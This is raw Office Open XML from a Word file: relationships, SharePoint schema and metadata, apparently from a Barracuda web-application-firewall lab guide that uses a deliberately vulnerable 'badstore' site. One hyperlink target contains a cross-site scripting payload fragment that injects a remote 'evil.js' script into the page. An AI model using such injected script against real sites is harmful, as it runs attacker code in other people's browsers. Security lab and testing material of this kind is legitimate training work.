            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="180755041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9256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hyperlink" Target="https://waas.barracudanetworks.co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s3.amazonaws.com/nmiron-sko20-labs/pricelist.da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badstore12.cudathon.com" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:julio.tan@gmail.com"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barracuda.slack.com//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s)" TargetMode="External"/><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6881ba4d214f4dce"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mailto:julio.tan@gmail.com" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.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EF37758DF4934DABE10B6C545A5B63" ma:contentTypeVersion="7" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="8c7ed43a9876fecbe2ee755cbc670457">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="487beb9d-e2ec-4f72-9e31-c09cf590627b" xmlns:ns4="cd9201ab-476d-4f92-a12b-d554c972af96" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1f6041ebe246b4a04a58101cedd30614" ns3:_="" ns4:_="">
    <xsd:import namespace="487beb9d-e2ec-4f72-9e31-c09cf590627b"/>
    <xsd:import namespace="cd9201ab-476d-4f92-a12b-d554c972af9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beb9d-e2ec-4f72-9e31-c09cf59062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201ab-476d-4f92-a12b-d554c972a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10CA25-C91B-4F5B-87E9-9CB6F8B36B88}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{940A9514-F76F-4911-BCAF-8AED2A84E645}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{88551E6B-B994-418F-ADAD-868531EFFD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beb9d-e2ec-4f72-9e31-c09cf590627b"/>
    <ds:schemaRef ds:uri="cd9201ab-476d-4f92-a12b-d554c972a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1A5075-8B51-4648-B94A-AD7AB81C485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2162</Words>
  <Characters>12330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Wenyu Zhang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Brett Wolmarans</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2021-04-23T05:39:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-23T05:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-23T05:43:00Z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0x010100FBEF37758DF4934DABE10B6C545A5B63</vt:lpwstr>
  </property>
</Properties>
</file>